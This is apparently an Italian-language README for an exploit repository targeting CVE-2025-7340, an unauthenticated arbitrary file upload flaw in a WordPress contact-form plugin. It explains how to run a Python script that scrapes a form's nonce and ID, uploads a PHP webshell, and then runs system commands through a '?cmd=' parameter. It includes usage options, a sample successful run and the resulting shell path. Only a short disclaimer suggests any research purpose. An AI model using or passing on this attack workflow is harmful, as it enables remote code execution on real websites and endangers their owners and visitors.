
HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. <= 2.2.1 - Caricamento Arbitrario di File non Autenticato
CVE: CVE-2025-7340
CVSS: 9.8 (Critico)
Il plugin HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. per WordPress è vulnerabile a caricamenti arbitrari di file a causa della mancanza di validazione del tipo di file nella funzione temp_file_upload in tutte le versioni fino alla 2.2.1 inclusa.
Ciò consente ad aggressori non autenticati di caricare file arbitrari sul server, portando potenzialmente a Esecuzione di Codice Remoto (RCE).
Questo repository include uno script Python di exploit che automatizza la scoperta del form vulnerabile e carica una webshell sul sito interessato.
Lo script rileva in modo intelligente i parametri richiesti (nonce, form_id, endpoint ajax) e carica una shell PHP nel percorso vulnerabile.
✅ Esempio di URL del form vulnerabile:
http://target.com/contact/
✅ Il form vulnerabile deve essere sulla pagina che passi all'opzione -u.
Prima di eseguire lo script, installa i moduli Python richiesti:
pip install -r requirements.txt
Contenuto di requirements.txt:
requests
colorama
usage: CVE-2025-7340.py [-h]
Exploit per CVE-2025-7340 - Caricamento Arbitrato di File Non Autenticato | di Khaled Alenazi (Nxploited)
options:
-h, --help mostra questo messaggio di aiuto ed esci
-u, --url URL URL del target es. http(s)://target.com
| Opzione | Descrizione |
|---|---|
-h, --help | Mostra questo messaggio di aiuto ed esci |
-u, --url URL | URL del target es. http(s)://target.com/contact |
Una volta che l'exploit viene completato con successo, puoi accedere alla shell caricata al percorso indicato.
Aggiungi ?cmd=<comando> per eseguire comandi di sistema.
✅ Esempio:
http://target.com/wp-content/uploads/ht_form/temp/shell.php?cmd=whoami
Avvio exploit contro il target...
Recupero della pagina target...
Estrazione dei parametri...
Nonce estratto: 346c441903
Endpoint AJAX: http://nxploit.ddev.site/wp-admin/admin-ajax.php
ID Form: 86
Generazione webshell...
Caricamento shell, attendere...
[+] Exploit completato con successo!
Vai a: wp-content/uploads/ht_form/temp/687590d90ac1c-shell.php
Exploit di: Khaled Alenazi (Nxploited) - GitHub: https://github.com/Nxploited
Questo strumento è fornito solo a scopo educativo e di ricerca.
L'autore non è responsabile per eventuali danni o usi impropri di questo codice.
Ottieni sempre il permesso esplicito prima di testare su qualsiasi sistema.
Khaled Alenazi (Nxploited)
GitHub: Nxploited